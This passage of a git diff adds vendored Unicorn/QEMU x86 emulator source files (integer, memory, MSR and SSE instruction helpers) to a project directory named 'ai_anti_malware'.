int64_t num, q; + + num = ((uint32_t)env->regs[R_EAX]) | ((uint64_t)((uint32_t)env->regs[R_EDX]) << 32); + den = (int)t0; + if (den == 0) { + raise_exception(env, EXCP00_DIVZ); + } + q = (num / den); + r = (num % den); + if (q != (int32_t)q) { + raise_exception(env, EXCP00_DIVZ); + } + env->regs[R_EAX] = (uint32_t)q; + env->regs[R_EDX] = (uint32_t)r; +} + +/* bcd */ + +/* XXX: exception */ +void helper_aam(CPUX86State *env, int base) +{ + int al, ah; + + al = env->regs[R_EAX] & 0xff; + ah = al / base; + al = al % base; + env->regs[R_EAX] = (env->regs[R_EAX] & ~0xffff) | al | (ah << 8); + CC_DST = al; +} + +void 
helper_aad(CPUX86State *env, int base) +{ + int al, ah; + + al = env->regs[R_EAX] & 0xff; + ah = (env->regs[R_EAX] >> 8) & 0xff; + al = ((ah * base) + al) & 0xff; + env->regs[R_EAX] = (env->regs[R_EAX] & ~0xffff) | al; + CC_DST = al; +} + +void helper_aaa(CPUX86State *env) +{ + int icarry; + int al, ah, af; + int eflags; + + eflags = cpu_cc_compute_all(env, CC_OP); + af = eflags & CC_A; + al = env->regs[R_EAX] & 0xff; + ah = (env->regs[R_EAX] >> 8) & 0xff; + + icarry = (al > 0xf9); + if (((al & 0x0f) > 9) || af) { + al = (al + 6) & 0x0f; + ah = (ah + 1 + icarry) & 0xff; + eflags |= CC_C | CC_A; + } else { + eflags &= ~(CC_C | CC_A); + al &= 0x0f; + } + env->regs[R_EAX] = (env->regs[R_EAX] & ~0xffff) | al | (ah << 8); + CC_SRC = eflags; +} + +void helper_aas(CPUX86State *env) +{ + int icarry; + int al, ah, af; + int eflags; + + eflags = cpu_cc_compute_all(env, CC_OP); + af = eflags & CC_A; + al = env->regs[R_EAX] & 0xff; + ah = (env->regs[R_EAX] >> 8) & 0xff; + + icarry = (al < 6); + if (((al & 0x0f) > 9) || af) { + al = (al - 6) & 0x0f; + ah = (ah - 1 - icarry) & 0xff; + eflags |= CC_C | CC_A; + } else { + eflags &= ~(CC_C | CC_A); + al &= 0x0f; + } + env->regs[R_EAX] = (env->regs[R_EAX] & ~0xffff) | al | (ah << 8); + CC_SRC = eflags; +} + +void helper_daa(CPUX86State *env) +{ + int old_al, al, af, cf; + int eflags; + + eflags = cpu_cc_compute_all(env, CC_OP); + cf = eflags & CC_C; + af = eflags & CC_A; + old_al = al = env->regs[R_EAX] & 0xff; + + eflags = 0; + if (((al & 0x0f) > 9) || af) { + al = (al + 6) & 0xff; + eflags |= CC_A; + } + if ((old_al > 0x99) || cf) { + al = (al + 0x60) & 0xff; + eflags |= CC_C; + } + env->regs[R_EAX] = (env->regs[R_EAX] & ~0xff) | al; + /* well, speed is not an issue here, so we compute the flags by hand */ + eflags |= (al == 0) << 6; /* zf */ + eflags |= parity_table[al]; /* pf */ + eflags |= (al & 0x80); /* sf */ + CC_SRC = eflags; +} + +void helper_das(CPUX86State *env) +{ + int al, al1, af, cf; + int eflags; + + eflags = 
cpu_cc_compute_all(env, CC_OP); + cf = eflags & CC_C; + af = eflags & CC_A; + al = env->regs[R_EAX] & 0xff; + + eflags = 0; + al1 = al; + if (((al & 0x0f) > 9) || af) { + eflags |= CC_A; + if (al < 6 || cf) { + eflags |= CC_C; + } + al = (al - 6) & 0xff; + } + if ((al1 > 0x99) || cf) { + al = (al - 0x60) & 0xff; + eflags |= CC_C; + } + env->regs[R_EAX] = (env->regs[R_EAX] & ~0xff) | al; + /* well, speed is not an issue here, so we compute the flags by hand */ + eflags |= (al == 0) << 6; /* zf */ + eflags |= parity_table[al]; /* pf */ + eflags |= (al & 0x80); /* sf */ + CC_SRC = eflags; +} + +#ifdef TARGET_X86_64 +static void add128(uint64_t *plow, uint64_t *phigh, uint64_t a, uint64_t b) +{ + *plow += a; + /* carry test */ + if (*plow < a) { + (*phigh)++; + } + *phigh += b; +} + +static void neg128(uint64_t *plow, uint64_t *phigh) +{ + *plow = ~*plow; + *phigh = ~*phigh; + add128(plow, phigh, 1, 0); +} + +/* return TRUE if overflow */ +static int div64(uint64_t *plow, uint64_t *phigh, uint64_t b) +{ + uint64_t q, r, a1, a0; + int i, qb, ab; + + a0 = *plow; + a1 = *phigh; + if (a1 == 0) { + q = a0 / b; + r = a0 % b; + *plow = q; + *phigh = r; + } else { + if (a1 >= b) { + return 1; + } + /* XXX: use a better algorithm */ + for (i = 0; i < 64; i++) { + ab = a1 >> 63; + a1 = (a1 << 1) | (a0 >> 63); + if (ab || a1 >= b) { + a1 -= b; + qb = 1; + } else { + qb = 0; + } + a0 = (a0 << 1) | qb; + } +#if defined(DEBUG_MULDIV) + printf("div: 0x%016" PRIx64 "%016" PRIx64 " / 0x%016" PRIx64 + ": q=0x%016" PRIx64 " r=0x%016" PRIx64 "\n", + *phigh, *plow, b, a0, a1); +#endif + *plow = a0; + *phigh = a1; + } + return 0; +} + +/* return TRUE if overflow */ +static int idiv64(uint64_t *plow, uint64_t *phigh, int64_t b) +{ + int sa, sb; + + sa = ((int64_t)*phigh < 0); + if (sa) { + neg128(plow, phigh); + } + sb = (b < 0); + if (sb && (b != 0x8000000000000000LL)) { + b = -b; + } + if (div64(plow, phigh, b) != 0) { + return 1; + } + if (sa ^ sb) { + if (*plow > (1ULL << 63)) { + return 
1; + } + *plow = 0-*plow; + } else { + if (*plow >= (1ULL << 63)) { + return 1; + } + } + if (sa) { + *phigh = 0-*phigh; + } + return 0; +} + +void helper_divq_EAX(CPUX86State *env, target_ulong t0) +{ + uint64_t r0, r1; + + if (t0 == 0) { + raise_exception(env, EXCP00_DIVZ); + } + r0 = env->regs[R_EAX]; + r1 = env->regs[R_EDX]; + if (div64(&r0, &r1, t0)) { + raise_exception(env, EXCP00_DIVZ); + } + env->regs[R_EAX] = r0; + env->regs[R_EDX] = r1; +} + +void helper_idivq_EAX(CPUX86State *env, target_ulong t0) +{ + uint64_t r0, r1; + + if (t0 == 0) { + raise_exception(env, EXCP00_DIVZ); + } + r0 = env->regs[R_EAX]; + r1 = env->regs[R_EDX]; + if (idiv64(&r0, &r1, t0)) { + raise_exception(env, EXCP00_DIVZ); + } + env->regs[R_EAX] = r0; + env->regs[R_EDX] = r1; +} +#endif + +#if TARGET_LONG_BITS == 32 +# define ctztl ctz32 +# define clztl clz32 +#else +# define ctztl ctz64 +# define clztl clz64 +#endif + +/* bit operations */ +target_ulong helper_ctz(target_ulong t0) +{ + return ctztl(t0); +} + +target_ulong helper_clz_x86(target_ulong t0) +{ + return clztl(t0); +} + +target_ulong helper_pdep(target_ulong src, target_ulong mask) +{ + target_ulong dest = 0; + int i, o; + + for (i = 0; mask != 0; i++) { + o = ctztl(mask); + mask &= mask - 1; + dest |= ((src >> i) & 1) << o; + } + return dest; +} + +target_ulong helper_pext(target_ulong src, target_ulong mask) +{ + target_ulong dest = 0; + int i, o; + + for (o = 0; mask != 0; o++) { + i = ctztl(mask); + mask &= mask - 1; + dest |= ((src >> i) & 1) << o; + } + return dest; +} + +#define SHIFT 0 +#include "shift_helper_template.h" +#undef SHIFT + +#define SHIFT 1 +#include "shift_helper_template.h" +#undef SHIFT + +#define SHIFT 2 +#include "shift_helper_template.h" +#undef SHIFT + +#ifdef TARGET_X86_64 +#define SHIFT 3 +#include "shift_helper_template.h" +#undef SHIFT +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/mem_helper.c 
b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/mem_helper.c new file mode 100644 index 0000000..f92c736 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/mem_helper.c @@ -0,0 +1,130 @@ +/* + * x86 memory access helpers + * + * Copyright (c) 2003 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ + +#include "cpu.h" +#include "exec/helper-proto.h" +#include "exec/cpu_ldst.h" + +#include "uc_priv.h" + +/* broken thread support */ + +void helper_lock(CPUX86State *env) +{ +} + +void helper_unlock(CPUX86State *env) +{ +} + +void helper_cmpxchg8b(CPUX86State *env, target_ulong a0) +{ + uint64_t d; + int eflags; + + eflags = cpu_cc_compute_all(env, CC_OP); + d = cpu_ldq_data(env, a0); + if (d == (((uint64_t)env->regs[R_EDX] << 32) | (uint32_t)env->regs[R_EAX])) { + cpu_stq_data(env, a0, ((uint64_t)env->regs[R_ECX] << 32) | (uint32_t)env->regs[R_EBX]); + eflags |= CC_Z; + } else { + /* always do the store */ + cpu_stq_data(env, a0, d); + env->regs[R_EDX] = (uint32_t)(d >> 32); + env->regs[R_EAX] = (uint32_t)d; + eflags &= ~CC_Z; + } + CC_SRC = eflags; +} + +#ifdef TARGET_X86_64 +void helper_cmpxchg16b(CPUX86State *env, target_ulong a0) +{ + uint64_t d0, d1; + int eflags; + + if ((a0 & 0xf) != 0) { + raise_exception(env, EXCP0D_GPF); + } + eflags = cpu_cc_compute_all(env, CC_OP); + d0 = cpu_ldq_data(env, a0); + d1 = 
cpu_ldq_data(env, a0 + 8); + if (d0 == env->regs[R_EAX] && d1 == env->regs[R_EDX]) { + cpu_stq_data(env, a0, env->regs[R_EBX]); + cpu_stq_data(env, a0 + 8, env->regs[R_ECX]); + eflags |= CC_Z; + } else { + /* always do the store */ + cpu_stq_data(env, a0, d0); + cpu_stq_data(env, a0 + 8, d1); + env->regs[R_EDX] = d1; + env->regs[R_EAX] = d0; + eflags &= ~CC_Z; + } + CC_SRC = eflags; +} +#endif + +void helper_boundw(CPUX86State *env, target_ulong a0, int v) +{ + int low, high; + + low = cpu_ldsw_data(env, a0); + high = cpu_ldsw_data(env, a0 + 2); + v = (int16_t)v; + if (v < low || v > high) { + raise_exception(env, EXCP05_BOUND); + } +} + +void helper_boundl(CPUX86State *env, target_ulong a0, int v) +{ + int low, high; + + low = cpu_ldl_data(env, a0); + high = cpu_ldl_data(env, a0 + 4); + if (v < low || v > high) { + raise_exception(env, EXCP05_BOUND); + } +} + +#if !defined(CONFIG_USER_ONLY) +/* try to fill the TLB and return an exception if error. If retaddr is + * NULL, it means that the function was called in C code (i.e. 
not + * from generated code or from helper.c) + */ +/* XXX: fix it to restore all registers */ +void tlb_fill(CPUState *cs, target_ulong addr, int is_write, int mmu_idx, + uintptr_t retaddr) +{ + int ret; + + ret = x86_cpu_handle_mmu_fault(cs, addr, is_write, mmu_idx); + if (ret) { + X86CPU *cpu = X86_CPU(cs->uc, cs); + CPUX86State *env = &cpu->env; + + if (retaddr) { + /* now we have a real cpu fault */ + cpu_restore_state(cs, retaddr); + } + raise_exception_err(env, cs->exception_index, env->error_code); + } +} +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/misc_helper.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/misc_helper.c new file mode 100644 index 0000000..a3950b7 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/misc_helper.c @@ -0,0 +1,598 @@ +/* + * x86 misc helpers + * + * Copyright (c) 2003 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . 
+ */ + +#include "cpu.h" +#include "exec/ioport.h" +#include "exec/helper-proto.h" +#include "exec/cpu_ldst.h" + +#include "uc_priv.h" + +void helper_outb(void *handle, uint32_t port, uint32_t data) +{ + cpu_outb(handle, port, data & 0xff); +} + +target_ulong helper_inb(void *handle, uint32_t port) +{ + return cpu_inb(handle, port); +} + +void helper_outw(void *handle, uint32_t port, uint32_t data) +{ + cpu_outw(handle, port, data & 0xffff); +} + +target_ulong helper_inw(void *handle, uint32_t port) +{ + return cpu_inw(handle, port); +} + +void helper_outl(void *handle, uint32_t port, uint32_t data) +{ + cpu_outl(handle, port, data); +} + +target_ulong helper_inl(void *handle, uint32_t port) +{ + return cpu_inl(handle, port); +} + +void helper_into(CPUX86State *env, int next_eip_addend) +{ + int eflags; + + eflags = cpu_cc_compute_all(env, CC_OP); + if (eflags & CC_O) { + raise_interrupt(env, EXCP04_INTO, 1, 0, next_eip_addend); + } +} + +void helper_single_step(CPUX86State *env) +{ +#ifndef CONFIG_USER_ONLY + check_hw_breakpoints(env, true); + env->dr[6] |= DR6_BS; +#endif + raise_exception(env, EXCP01_DB); +} + +void helper_cpuid(CPUX86State *env) +{ + uint32_t eax, ebx, ecx, edx; + + cpu_svm_check_intercept_param(env, SVM_EXIT_CPUID, 0); + + cpu_x86_cpuid(env, (uint32_t)env->regs[R_EAX], (uint32_t)env->regs[R_ECX], + &eax, &ebx, &ecx, &edx); + env->regs[R_EAX] = eax; + env->regs[R_EBX] = ebx; + env->regs[R_ECX] = ecx; + env->regs[R_EDX] = edx; +} + +#if defined(CONFIG_USER_ONLY) +target_ulong helper_read_crN(CPUX86State *env, int reg) +{ + return 0; +} + +void helper_write_crN(CPUX86State *env, int reg, target_ulong t0) +{ +} + +void helper_movl_drN_T0(CPUX86State *env, int reg, target_ulong t0) +{ +} +#else +target_ulong helper_read_crN(CPUX86State *env, int reg) +{ + target_ulong val; + + cpu_svm_check_intercept_param(env, SVM_EXIT_READ_CR0 + reg, 0); + switch (reg) { + default: + val = env->cr[reg]; + break; + case 8: + if (!(env->hflags2 & HF2_VINTR_MASK)) { 
+ val = cpu_get_apic_tpr(env->uc, x86_env_get_cpu(env)->apic_state); + } else { + val = env->v_tpr; + } + break; + } + return val; +} + +void helper_write_crN(CPUX86State *env, int reg, target_ulong t0) +{ + cpu_svm_check_intercept_param(env, SVM_EXIT_WRITE_CR0 + reg, 0); + switch (reg) { + case 0: + cpu_x86_update_cr0(env, (uint32_t)t0); + break; + case 3: + cpu_x86_update_cr3(env, t0); + break; + case 4: + cpu_x86_update_cr4(env, (uint32_t)t0); + break; + case 8: + if (!(env->hflags2 & HF2_VINTR_MASK)) { + cpu_set_apic_tpr(env->uc, x86_env_get_cpu(env)->apic_state, (uint8_t)t0); + } + env->v_tpr = t0 & 0x0f; + break; + default: + env->cr[reg] = t0; + break; + } +} + +void helper_movl_drN_T0(CPUX86State *env, int reg, target_ulong t0) +{ + int i; + + if (reg < 4) { + hw_breakpoint_remove(env, reg); + env->dr[reg] = t0; + hw_breakpoint_insert(env, reg); + } else if (reg == 7) { + for (i = 0; i < DR7_MAX_BP; i++) { + hw_breakpoint_remove(env, i); + } + env->dr[7] = t0; + for (i = 0; i < DR7_MAX_BP; i++) { + hw_breakpoint_insert(env, i); + } + } else { + env->dr[reg] = t0; + } +} +#endif + +void helper_lmsw(CPUX86State *env, target_ulong t0) +{ + /* only 4 lower bits of CR0 are modified. PE cannot be set to zero + if already set to one. 
*/ + t0 = (env->cr[0] & ~0xe) | (t0 & 0xf); + helper_write_crN(env, 0, t0); +} + +void helper_invlpg(CPUX86State *env, target_ulong addr) +{ + X86CPU *cpu = x86_env_get_cpu(env); + + cpu_svm_check_intercept_param(env, SVM_EXIT_INVLPG, 0); + tlb_flush_page(CPU(cpu), addr); +} + +void helper_rdtsc(CPUX86State *env) +{ + uint64_t val; + + if ((env->cr[4] & CR4_TSD_MASK) && ((env->hflags & HF_CPL_MASK) != 0)) { + raise_exception(env, EXCP0D_GPF); + } + cpu_svm_check_intercept_param(env, SVM_EXIT_RDTSC, 0); + + val = cpu_get_tsc(env) + env->tsc_offset; + env->regs[R_EAX] = (uint32_t)(val); + env->regs[R_EDX] = (uint32_t)(val >> 32); +} + +void helper_rdtscp(CPUX86State *env) +{ + helper_rdtsc(env); + env->regs[R_ECX] = (uint32_t)(env->tsc_aux); +} + +void helper_rdpmc(CPUX86State *env) +{ + if ((env->cr[4] & CR4_PCE_MASK) && ((env->hflags & HF_CPL_MASK) != 0)) { + raise_exception(env, EXCP0D_GPF); + } + cpu_svm_check_intercept_param(env, SVM_EXIT_RDPMC, 0); + + /* currently unimplemented */ + qemu_log_mask(LOG_UNIMP, "x86: unimplemented rdpmc\n"); + raise_exception_err(env, EXCP06_ILLOP, 0); +} + +#if defined(CONFIG_USER_ONLY) +void helper_wrmsr(CPUX86State *env) +{ +} + +void helper_rdmsr(CPUX86State *env) +{ +} +#else +void helper_wrmsr(CPUX86State *env) +{ + uint64_t val; + + cpu_svm_check_intercept_param(env, SVM_EXIT_MSR, 1); + + val = ((uint32_t)env->regs[R_EAX]) | + ((uint64_t)((uint32_t)env->regs[R_EDX]) << 32); + + switch ((uint32_t)env->regs[R_ECX]) { + case MSR_IA32_SYSENTER_CS: + env->sysenter_cs = val & 0xffff; + break; + case MSR_IA32_SYSENTER_ESP: + env->sysenter_esp = val; + break; + case MSR_IA32_SYSENTER_EIP: + env->sysenter_eip = val; + break; + case MSR_IA32_APICBASE: + cpu_set_apic_base(env->uc, x86_env_get_cpu(env)->apic_state, val); + break; + case MSR_EFER: + { + uint64_t update_mask; + + update_mask = 0; + if (env->features[FEAT_8000_0001_EDX] & CPUID_EXT2_SYSCALL) { + update_mask |= MSR_EFER_SCE; + } + if (env->features[FEAT_8000_0001_EDX] & 
CPUID_EXT2_LM) { + update_mask |= MSR_EFER_LME; + } + if (env->features[FEAT_8000_0001_EDX] & CPUID_EXT2_FFXSR) { + update_mask |= MSR_EFER_FFXSR; + } + if (env->features[FEAT_8000_0001_EDX] & CPUID_EXT2_NX) { + update_mask |= MSR_EFER_NXE; + } + if (env->features[FEAT_8000_0001_ECX] & CPUID_EXT3_SVM) { + update_mask |= MSR_EFER_SVME; + } + if (env->features[FEAT_8000_0001_EDX] & CPUID_EXT2_FFXSR) { + update_mask |= MSR_EFER_FFXSR; + } + cpu_load_efer(env, (env->efer & ~update_mask) | + (val & update_mask)); + } + break; + case MSR_STAR: + env->star = val; + break; + case MSR_PAT: + env->pat = val; + break; + case MSR_VM_HSAVE_PA: + env->vm_hsave = val; + break; +#ifdef TARGET_X86_64 + case MSR_LSTAR: + env->lstar = val; + break; + case MSR_CSTAR: + env->cstar = val; + break; + case MSR_FMASK: + env->fmask = val; + break; + case MSR_FSBASE: + env->segs[R_FS].base = val; + break; + case MSR_GSBASE: + env->segs[R_GS].base = val; + break; + case MSR_KERNELGSBASE: + env->kernelgsbase = val; + break; +#endif + case MSR_MTRRphysBase(0): + case MSR_MTRRphysBase(1): + case MSR_MTRRphysBase(2): + case MSR_MTRRphysBase(3): + case MSR_MTRRphysBase(4): + case MSR_MTRRphysBase(5): + case MSR_MTRRphysBase(6): + case MSR_MTRRphysBase(7): + env->mtrr_var[((uint32_t)env->regs[R_ECX] - + MSR_MTRRphysBase(0)) / 2].base = val; + break; + case MSR_MTRRphysMask(0): + case MSR_MTRRphysMask(1): + case MSR_MTRRphysMask(2): + case MSR_MTRRphysMask(3): + case MSR_MTRRphysMask(4): + case MSR_MTRRphysMask(5): + case MSR_MTRRphysMask(6): + case MSR_MTRRphysMask(7): + env->mtrr_var[((uint32_t)env->regs[R_ECX] - + MSR_MTRRphysMask(0)) / 2].mask = val; + break; + case MSR_MTRRfix64K_00000: + env->mtrr_fixed[(uint32_t)env->regs[R_ECX] - + MSR_MTRRfix64K_00000] = val; + break; + case MSR_MTRRfix16K_80000: + case MSR_MTRRfix16K_A0000: + env->mtrr_fixed[(uint32_t)env->regs[R_ECX] - + MSR_MTRRfix16K_80000 + 1] = val; + break; + case MSR_MTRRfix4K_C0000: + case MSR_MTRRfix4K_C8000: + case 
MSR_MTRRfix4K_D0000: + case MSR_MTRRfix4K_D8000: + case MSR_MTRRfix4K_E0000: + case MSR_MTRRfix4K_E8000: + case MSR_MTRRfix4K_F0000: + case MSR_MTRRfix4K_F8000: + env->mtrr_fixed[(uint32_t)env->regs[R_ECX] - + MSR_MTRRfix4K_C0000 + 3] = val; + break; + case MSR_MTRRdefType: + env->mtrr_deftype = val; + break; + case MSR_MCG_STATUS: + env->mcg_status = val; + break; + case MSR_MCG_CTL: + if ((env->mcg_cap & MCG_CTL_P) + && (val == 0 || val == ~(uint64_t)0)) { + env->mcg_ctl = val; + } + break; + case MSR_TSC_AUX: + env->tsc_aux = val; + break; + case MSR_IA32_MISC_ENABLE: + env->msr_ia32_misc_enable = val; + break; + default: + if ((uint32_t)env->regs[R_ECX] >= MSR_MC0_CTL + && (uint32_t)env->regs[R_ECX] < MSR_MC0_CTL + + (4 * env->mcg_cap & 0xff)) { + uint32_t offset = (uint32_t)env->regs[R_ECX] - MSR_MC0_CTL; + if ((offset & 0x3) != 0 + || (val == 0 || val == ~(uint64_t)0)) { + env->mce_banks[offset] = val; + } + break; + } + /* XXX: exception? */ + break; + } +} + +void helper_rdmsr(CPUX86State *env) +{ + uint64_t val; + + cpu_svm_check_intercept_param(env, SVM_EXIT_MSR, 0); + + switch ((uint32_t)env->regs[R_ECX]) { + case MSR_IA32_SYSENTER_CS: + val = env->sysenter_cs; + break; + case MSR_IA32_SYSENTER_ESP: + val = env->sysenter_esp; + break; + case MSR_IA32_SYSENTER_EIP: + val = env->sysenter_eip; + break; + case MSR_IA32_APICBASE: + val = cpu_get_apic_base(env->uc, x86_env_get_cpu(env)->apic_state); + break; + case MSR_EFER: + val = env->efer; + break; + case MSR_STAR: + val = env->star; + break; + case MSR_PAT: + val = env->pat; + break; + case MSR_VM_HSAVE_PA: + val = env->vm_hsave; + break; + case MSR_IA32_PERF_STATUS: + /* tsc_increment_by_tick */ + val = 1000ULL; + /* CPU multiplier */ + val |= (((uint64_t)4ULL) << 40); + break; +#ifdef TARGET_X86_64 + case MSR_LSTAR: + val = env->lstar; + break; + case MSR_CSTAR: + val = env->cstar; + break; + case MSR_FMASK: + val = env->fmask; + break; + case MSR_FSBASE: + val = env->segs[R_FS].base; + break; + case 
MSR_GSBASE: + val = env->segs[R_GS].base; + break; + case MSR_KERNELGSBASE: + val = env->kernelgsbase; + break; + case MSR_TSC_AUX: + val = env->tsc_aux; + break; +#endif + case MSR_MTRRphysBase(0): + case MSR_MTRRphysBase(1): + case MSR_MTRRphysBase(2): + case MSR_MTRRphysBase(3): + case MSR_MTRRphysBase(4): + case MSR_MTRRphysBase(5): + case MSR_MTRRphysBase(6): + case MSR_MTRRphysBase(7): + val = env->mtrr_var[((uint32_t)env->regs[R_ECX] - + MSR_MTRRphysBase(0)) / 2].base; + break; + case MSR_MTRRphysMask(0): + case MSR_MTRRphysMask(1): + case MSR_MTRRphysMask(2): + case MSR_MTRRphysMask(3): + case MSR_MTRRphysMask(4): + case MSR_MTRRphysMask(5): + case MSR_MTRRphysMask(6): + case MSR_MTRRphysMask(7): + val = env->mtrr_var[((uint32_t)env->regs[R_ECX] - + MSR_MTRRphysMask(0)) / 2].mask; + break; + case MSR_MTRRfix64K_00000: + val = env->mtrr_fixed[0]; + break; + case MSR_MTRRfix16K_80000: + case MSR_MTRRfix16K_A0000: + val = env->mtrr_fixed[(uint32_t)env->regs[R_ECX] - + MSR_MTRRfix16K_80000 + 1]; + break; + case MSR_MTRRfix4K_C0000: + case MSR_MTRRfix4K_C8000: + case MSR_MTRRfix4K_D0000: + case MSR_MTRRfix4K_D8000: + case MSR_MTRRfix4K_E0000: + case MSR_MTRRfix4K_E8000: + case MSR_MTRRfix4K_F0000: + case MSR_MTRRfix4K_F8000: + val = env->mtrr_fixed[(uint32_t)env->regs[R_ECX] - + MSR_MTRRfix4K_C0000 + 3]; + break; + case MSR_MTRRdefType: + val = env->mtrr_deftype; + break; + case MSR_MTRRcap: + if (env->features[FEAT_1_EDX] & CPUID_MTRR) { + val = MSR_MTRRcap_VCNT | MSR_MTRRcap_FIXRANGE_SUPPORT | + MSR_MTRRcap_WC_SUPPORTED; + } else { + /* XXX: exception? 
*/ + val = 0; + } + break; + case MSR_MCG_CAP: + val = env->mcg_cap; + break; + case MSR_MCG_CTL: + if (env->mcg_cap & MCG_CTL_P) { + val = env->mcg_ctl; + } else { + val = 0; + } + break; + case MSR_MCG_STATUS: + val = env->mcg_status; + break; + case MSR_IA32_MISC_ENABLE: + val = env->msr_ia32_misc_enable; + break; + default: + if ((uint32_t)env->regs[R_ECX] >= MSR_MC0_CTL + && (uint32_t)env->regs[R_ECX] < MSR_MC0_CTL + + (4 * env->mcg_cap & 0xff)) { + uint32_t offset = (uint32_t)env->regs[R_ECX] - MSR_MC0_CTL; + val = env->mce_banks[offset]; + break; + } + /* XXX: exception? */ + val = 0; + break; + } + env->regs[R_EAX] = (uint32_t)(val); + env->regs[R_EDX] = (uint32_t)(val >> 32); +} +#endif + +static void do_pause(X86CPU *cpu) +{ + CPUState *cs = CPU(cpu); + + /* Just let another CPU run. */ + cs->exception_index = EXCP_INTERRUPT; + cpu_loop_exit(cs); +} + +static void do_hlt(X86CPU *cpu) +{ + CPUState *cs = CPU(cpu); + CPUX86State *env = &cpu->env; + + env->hflags &= ~HF_INHIBIT_IRQ_MASK; /* needed if sti is just before */ + cs->halted = 1; + cs->exception_index = EXCP_HLT; + cpu_loop_exit(cs); +} + +void helper_hlt(CPUX86State *env, int next_eip_addend) +{ + X86CPU *cpu = x86_env_get_cpu(env); + + cpu_svm_check_intercept_param(env, SVM_EXIT_HLT, 0); + env->eip += next_eip_addend; + + do_hlt(cpu); +} + +void helper_monitor(CPUX86State *env, target_ulong ptr) +{ + if ((uint32_t)env->regs[R_ECX] != 0) { + raise_exception(env, EXCP0D_GPF); + } + /* XXX: store address? 
*/ + cpu_svm_check_intercept_param(env, SVM_EXIT_MONITOR, 0); +} + +void helper_mwait(CPUX86State *env, int next_eip_addend) +{ + X86CPU *cpu; + + if ((uint32_t)env->regs[R_ECX] != 0) { + raise_exception(env, EXCP0D_GPF); + } + cpu_svm_check_intercept_param(env, SVM_EXIT_MWAIT, 0); + env->eip += next_eip_addend; + + cpu = x86_env_get_cpu(env); + /* XXX: not complete but not completely erroneous */ + do_hlt(cpu); +} + +void helper_pause(CPUX86State *env, int next_eip_addend) +{ + X86CPU *cpu = x86_env_get_cpu(env); + + cpu_svm_check_intercept_param(env, SVM_EXIT_PAUSE, 0); + env->eip += next_eip_addend; + + do_pause(cpu); +} + +void helper_debug(CPUX86State *env) +{ + CPUState *cs = CPU(x86_env_get_cpu(env)); + + cs->exception_index = EXCP_DEBUG; + cpu_loop_exit(cs); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/ops_sse.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/ops_sse.h new file mode 100644 index 0000000..8a8cda9 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/ops_sse.h @@ -0,0 +1,2335 @@ +/* + * MMX/3DNow!/SSE/SSE2/SSE3/SSSE3/SSE4/PNI support + * + * Copyright (c) 2005 Fabrice Bellard + * Copyright (c) 2008 Intel Corporation + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ + +#include "qemu/aes.h" + +#if SHIFT == 0 +#define Reg MMXReg +#define XMM_ONLY(...) 
+#define B(n) MMX_B(n) +#define W(n) MMX_W(n) +#define L(n) MMX_L(n) +#define Q(n) q +#define SUFFIX _mmx +#else +#define Reg XMMReg +#define XMM_ONLY(...) __VA_ARGS__ +#define B(n) XMM_B(n) +#define W(n) XMM_W(n) +#define L(n) XMM_L(n) +#define Q(n) XMM_Q(n) +#define SUFFIX _xmm +#endif + +void glue(helper_psrlw, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + int shift; + + if (s->Q(0) > 15) { + d->Q(0) = 0; +#if SHIFT == 1 + d->Q(1) = 0; +#endif + } else { + shift = s->B(0); + d->W(0) >>= shift; + d->W(1) >>= shift; + d->W(2) >>= shift; + d->W(3) >>= shift; +#if SHIFT == 1 + d->W(4) >>= shift; + d->W(5) >>= shift; + d->W(6) >>= shift; + d->W(7) >>= shift; +#endif + } +} + +void glue(helper_psraw, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + int shift; + + if (s->Q(0) > 15) { + shift = 15; + } else { + shift = s->B(0); + } + d->W(0) = (int16_t)d->W(0) >> shift; + d->W(1) = (int16_t)d->W(1) >> shift; + d->W(2) = (int16_t)d->W(2) >> shift; + d->W(3) = (int16_t)d->W(3) >> shift; +#if SHIFT == 1 + d->W(4) = (int16_t)d->W(4) >> shift; + d->W(5) = (int16_t)d->W(5) >> shift; + d->W(6) = (int16_t)d->W(6) >> shift; + d->W(7) = (int16_t)d->W(7) >> shift; +#endif +} + +void glue(helper_psllw, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + int shift; + + if (s->Q(0) > 15) { + d->Q(0) = 0; +#if SHIFT == 1 + d->Q(1) = 0; +#endif + } else { + shift = s->B(0); + d->W(0) <<= shift; + d->W(1) <<= shift; + d->W(2) <<= shift; + d->W(3) <<= shift; +#if SHIFT == 1 + d->W(4) <<= shift; + d->W(5) <<= shift; + d->W(6) <<= shift; + d->W(7) <<= shift; +#endif + } +} + +void 